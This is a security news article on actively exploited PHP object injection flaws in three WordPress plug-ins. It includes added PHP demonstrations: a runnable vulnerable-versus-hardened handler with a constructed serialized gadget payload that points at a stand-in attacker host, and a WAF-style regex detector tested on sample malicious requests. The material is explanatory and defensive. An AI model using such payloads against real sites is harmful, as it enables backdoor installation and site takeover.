Vulnerabilities in three different plug-ins have affected an estimated 21,000 WordPress sites.
Zero-day vulnerabilities have always been valuable to cybercriminals, who have used them time and again to compromise websites and devices. This time the target was WordPress, the popular website-building platform.
The security firm Wordfence recently reported that three WordPress plug-ins with zero-day vulnerabilities were being actively exploited, affecting thousands of websites. Since the report, updated versions of the three plug-ins have been released that close the hole.
The underlying flaw in all three cases was a PHP object injection vulnerability: each plug-in passed attacker-controlled input to PHP's unserialize(), which lets an attacker instantiate classes of their choosing with properties of their choosing, so that any class with a "magic" method such as __wakeup() or __destruct() becomes a gadget that runs on the attacker's behalf. Wordfence came across the vulnerabilities during a routine site-cleaning engagement: it found several hacked websites and immediately suspected that exploited plug-ins were the cause.
On closer inspection, the exploited plug-ins had each written a malicious file to the victim's site, while the web server logs merely showed a POST request to /wp-admin/admin-ajax.php. That endpoint receives a large volume of legitimate traffic, and ordinary access logs do not record POST bodies, so the exploit payload itself left no trace in the logs.
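To make the mechanism concrete, here is an added illustration of the vulnerable pattern beside its hardened form. It is written for this page and is not code from Appointments, Flickr Gallery or RegistrationMagic; the class name RemoteAssetCache, the handler names and the attacker URL are hypothetical, and the destructor writes a fixed string instead of fetching anything so the script runs offline.

```php
<?php
// Added illustration of PHP object injection; not code from any of the three affected plug-ins.
// RemoteAssetCache, the handler names and the URL are hypothetical.

// A "gadget" class of the kind that makes unserialize() dangerous. PHP calls __destruct()
// when the object is freed, so an attacker who controls the serialized properties also
// controls what gets fetched and where it is written.
class RemoteAssetCache {
    public $source;   // URL the plug-in would normally fetch an asset from
    public $target;   // local path it caches the asset to

    public function __destruct() {
        if ($this->source && $this->target) {
            // Real plug-in code would call wp_remote_get() or file_get_contents($this->source).
            // The demo substitutes a fixed string so it can be run without network access.
            $body = "<?php /* fetched from {$this->source} */ ?>";
            file_put_contents($this->target, $body);
        }
    }
}

// Vulnerable pattern: untrusted POST data goes straight into unserialize().
function vulnerable_ajax_handler(array $post): void {
    $state = unserialize($post['state']);   // attacker chooses the class and its properties
    // The handler never even has to use $state: the destructor fires when $state is freed.
}

// Hardened pattern: refuse to instantiate any class (PHP >= 7.0). Any object in the payload
// becomes __PHP_Incomplete_Class, which has no destructor, so no gadget runs. Better still is
// to avoid serialize() for client-supplied state entirely and use json_decode() instead.
function hardened_ajax_handler(array $post): array {
    $state = unserialize($post['state'], ['allowed_classes' => false]);
    if (!is_array($state)) {
        return [];   // objects are not an acceptable shape for this handler's input
    }
    return $state;
}

// Constructed attacker payload: an object whose properties point the destructor at a path of
// the attacker's choosing (a temp file here; on a real site, somewhere under the web root).
$target  = sys_get_temp_dir() . '/backdoor-demo.php';
$payload = 'O:16:"RemoteAssetCache":2:{'
         . 's:6:"source";s:26:"http://attacker.invalid/bd";'
         . 's:6:"target";s:' . strlen($target) . ':"' . $target . '";}';

vulnerable_ajax_handler(['state' => $payload]);
echo file_exists($target) ? "vulnerable handler wrote $target\n" : "no file written\n";
if (file_exists($target)) { unlink($target); }

hardened_ajax_handler(['state' => $payload]);
echo file_exists($target) ? "hardened handler wrote $target\n" : "hardened handler: no file written\n";
```

Run with `php demo.php`: the first call writes the file because the destructor of the attacker-chosen class runs as soon as the unserialized object is discarded; the second call writes nothing. Note that the hardened handler still has to validate the shape of what comes back, since `allowed_classes => false` stops instantiation but does not make the payload trustworthy.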
Wordfence then recorded the attacks in its threat database. Its lead developer, Matt Barry, reconstructed the exploits and immediately wrote new WAF rules to block them. The rules were pushed to all Wordfence Premium users to protect them from the exploited plug-ins, and the plug-in authors were notified as well.
The affected plug-ins included: WPMU Dev’s Appointments (fixed in v.2.2.2), Dan Coulter’s Flickr Gallery (fixed in v.1.5.3), and CMSHelpLive’s RegistrationMagic-Custom Registration Forms (fixed in v.184.108.40.206).
In its advisory, Wordfence explained that the vulnerabilities let attackers install backdoors on WordPress websites, and warned users to exercise caution when installing new plug-ins. Updating a plug-in closes the hole but does not remove a backdoor that was already dropped, so a site that ran a vulnerable version while the attacks were under way should also be checked for unexpected PHP files.
The number of affected websites is estimated at 21,000. That comparatively low figure reflects the modest install base of the three plug-ins; Wordfence nonetheless issued a warning to all WordPress users.
On the CVSSv3 severity scale the vulnerabilities score 9.8 out of 10, which places them in the Critical band: a score consistent with a flaw that is reachable over the network, needs no authentication or user interaction, and yields full compromise of the site.
Brad Haas, a researcher at Wordfence, stated that the vulnerability allowed attackers to force a website to "fetch a remote file", which turned out to be a PHP backdoor, and to store it at a location of the attacker's choosing. That write is the backdoor installation; nothing further is needed.
According to Haas, exploiting the vulnerability did not require much skill. An attacker only has to package the exploit in an HTTP POST request and send it to the targeted website; no authentication is needed at any point. Equally alarming, the fixes were easy to reverse engineer: an attacker could read the plug-ins' changelogs and compare the vulnerable and patched versions to deduce how to exploit the code.
Sites running the Flickr Gallery plug-in are exposed through the site's root URL, whereas the other two plug-ins are reached through a POST request to admin-ajax.php. Once the backdoor is in place, the attacker has code execution on the site and can take it over quickly and easily.
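Because the three plug-ins are reached through different endpoints, a WAF rule that keys on the path alone would miss one of them; the common denominator is a serialized PHP object arriving in a request parameter. The following is an added example of such a check, written for this page; it is not Wordfence's rule set and not code from the plug-ins. The sample requests are constructed, and the paths, action names and parameter names are hypothetical.

```php
<?php
// Added example of a WAF-style check for serialized PHP objects in request parameters.
// Not Wordfence's rule set; the sample requests, paths and parameter names are constructed.

// Does a string carry a PHP-serialized object? Matches O:<len>:"Class":<n>:{ (ordinary
// objects) and C:<len>:"Class":<n>:{ (classes implementing Serializable), either at the start
// of the value or nested inside a serialized array, so a gadget hidden in a:1:{...} is caught.
function contains_serialized_object(string $value): bool {
    $re = '/(?:^|[;{])[OC]:\d+:"[A-Za-z_\\\\][\w\\\\]*":\d+:\{/';
    return preg_match($re, $value) === 1;
}

// Flatten nested form fields (data[a][b]=x) into "data[a][b]" => "x".
function flatten_params(array $params, string $prefix = ''): array {
    $flat = [];
    foreach ($params as $key => $value) {
        $name = $prefix === '' ? (string) $key : "{$prefix}[{$key}]";
        if (is_array($value)) {
            $flat += flatten_params($value, $name);
        } else {
            $flat[$name] = (string) $value;
        }
    }
    return $flat;
}

// Inspect one request. Every parameter is checked regardless of path, because the plug-ins
// were reached through different endpoints (admin-ajax.php for two of them, the site root
// for Flickr Gallery). The raw body is checked too, in case the content type is not a form.
function inspect_request(string $method, string $path, string $query, string $body): array {
    parse_str($query, $queryParams);
    parse_str($body, $bodyParams);
    $hits = [];
    foreach (flatten_params($queryParams) as $name => $value) {
        if (contains_serialized_object($value)) { $hits[] = "query:$name"; }
    }
    foreach (flatten_params($bodyParams) as $name => $value) {
        if (contains_serialized_object($value)) { $hits[] = "body:$name"; }
    }
    if ($hits === [] && contains_serialized_object($body)) {
        $hits[] = 'body:(raw)';
    }
    return ['block' => $hits !== [], 'hits' => $hits, 'request' => "$method $path"];
}

// Constructed samples. The gadget class name is made up for the illustration.
$gadget = 'O:16:"RemoteAssetCache":2:{s:6:"source";s:26:"http://attacker.invalid/bd";'
        . 's:6:"target";s:12:"backdoor.php";}';
$samples = [
    // Ordinary WordPress heartbeat call: must be allowed.
    ['POST', '/wp-admin/admin-ajax.php', '',
     'action=heartbeat&_nonce=abc123&data%5Bwp-refresh-post-lock%5D%5Bpost_id%5D=42'],
    // Serialized object in a POST parameter to admin-ajax.php: block.
    ['POST', '/wp-admin/admin-ajax.php', '', 'action=app_state&state=' . urlencode($gadget)],
    // The same gadget nested inside a serialized array, sent to the site root: block.
    ['POST', '/', '', 'gallery=' . urlencode('a:1:{i:0;' . $gadget . '}')],
    // Serialized array holding only scalars: legitimate, must be allowed.
    ['POST', '/wp-admin/admin-ajax.php', '',
     'action=save&opts=' . urlencode('a:1:{s:5:"color";s:4:"blue";}')],
];

foreach ($samples as [$method, $path, $query, $body]) {
    $verdict = inspect_request($method, $path, $query, $body);
    printf("%-5s %-26s %s %s\n", $method, $path,
           $verdict['block'] ? 'BLOCK' : 'allow', implode(',', $verdict['hits']));
}
```

Running it prints `allow` for the heartbeat and scalar-array requests and `BLOCK` for the two carrying the gadget, naming the offending parameter (`body:state` and `body:gallery`). The rule is deliberately broad: a well-behaved plug-in has no reason to accept serialized objects from a browser, so a false positive here points at code that should be using JSON anyway.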